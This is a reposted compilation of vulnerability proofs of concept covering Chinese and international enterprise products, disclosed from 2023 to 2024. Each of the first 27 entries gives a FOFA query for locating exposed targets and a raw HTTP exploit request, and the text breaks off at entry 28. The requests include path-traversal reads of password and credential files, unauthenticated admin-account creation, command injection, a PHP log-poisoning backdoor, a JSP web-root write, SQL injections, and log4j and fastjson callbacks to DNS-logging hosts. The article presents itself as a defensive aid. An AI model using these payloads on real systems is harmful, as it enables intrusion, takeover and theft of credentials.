Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界, author 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive/defensive exercises, so this article is meant to help the defending side. Defenders can use it to check their own exposure: each entry below gives a FOFA fingerprint query that identifies the product and the raw HTTP request of the POC, and the request paths and parameters double as detection signatures for WAF rules and log review.

Vulnerability sources: the article covers 203 high-impact vulnerability POCs disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were collected and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced with the placeholder PAYLOAD; search for the complete POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the complete list as it stands; use F12 to search the page for keywords.

Bookmark this article if you find it useful, or follow the public account (网络安全新视界).

Contents
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT integrated management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin (奇安信) 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical imaging archive and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

A 200 response with memory-tracker data means the backend HTTP interface is exposed without authentication.

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Send the raw request as shown; browsers and most HTTP clients normalize the ../ segments away before the request leaves the machine.

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

The log parameter is passed to a shell unescaped; the output of whoami comes back in the response.

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

jdbc.properties holds the database connection string and credentials, which is why the POC targets it.

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default account admin, then send the request below. The sysauth cookie and the stok token in the path both come from the login response (stok is the LuCI session token). The %s placeholders come from the original exploit template; the injected command is the "; id;" appended to the wifiRebootrange value.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword…
Host: x.x.x.x

The payload is the double URL encoding of the statement below. Decode it twice to get the original back; a filter that decodes only once sees percent sequences rather than the quote and parentheses.

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The injected 1=@@version makes SQL Server try to convert the version string to an integer; the conversion error returned to the client contains the full version string, which confirms the injection.

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the session cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language parameter is set to ../../application/logs, and the login field is PHP code that executes the base64-decoded value of the K1SYJPMHLU4Z request header; the failed login attempt, code included, is written to the application log for that day.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: request the log page for that day (the file name follows the Date header of the response above). The log is rendered as PHP, so the injected code runs and executes the command carried in the K1SYJPMHLU4Z header, base64-encoded: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= decodes to echo ---------;id 2>&1;echo ---------; so the output of id appears between the two dashed markers.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ;.ico suffix is a matrix-parameter segment: the login filter treats the raw URI as a static resource and lets it through, while Spring MVC strips the suffix before routing and still dispatches to getAllList.

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

Same idea as item 14 through path normalization: the raw URI contains .ico and passes the login filter, and the /../ is resolved to /user/getAllList before dispatch. Send it raw; HTTP clients normalize the path away otherwise.

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC injects a SQL Server expression that computes the MD5 of 1234 with HASHBYTES: 1-CONVERT(VARCHAR(32), HASHBYTES('MD5', '1234'), 2). Subtracting the hex string from 1 fails type conversion, and the error message returns the hash (81dc9bdb52d04dc20036dbd8313ed055).
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?w sdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

The updatexml() error in the SOAP fault echoes the MD5 hash of 102103122, which confirms the injection.

18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The EXTRACTVALUE error response contains the database user name between the two ~ characters.

20. Dahua (大华) ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The fileUrl parameter accepts a file: URL, so the server reads and returns the local file instead of a picture.

21. Dahua (大华) ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
""
}

This is the standard fastjson probe; the malformed JSON is intentional. A DNS query for the dnslog host coming from the target shows that fastjson instantiated the java.net.URL, i.e. that the deserialization sink is reachable. Replace the dnslog host with one you control.

22. Dahua (大华) ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

Replace dnslog with a DNS logging domain you control; a lookup from the target confirms that the value reaches a vulnerable log4j.

23. Dahua (大华) ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same endpoint and probe as item 21, with a generic DNSLOG placeholder.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

The fname field sets the destination path, so the .txt upload is written as a .jsp under the nc_web web root; requesting /2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp afterwards should return 2XpU7Y2Els1K9wZvOlSmrgolNci.

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
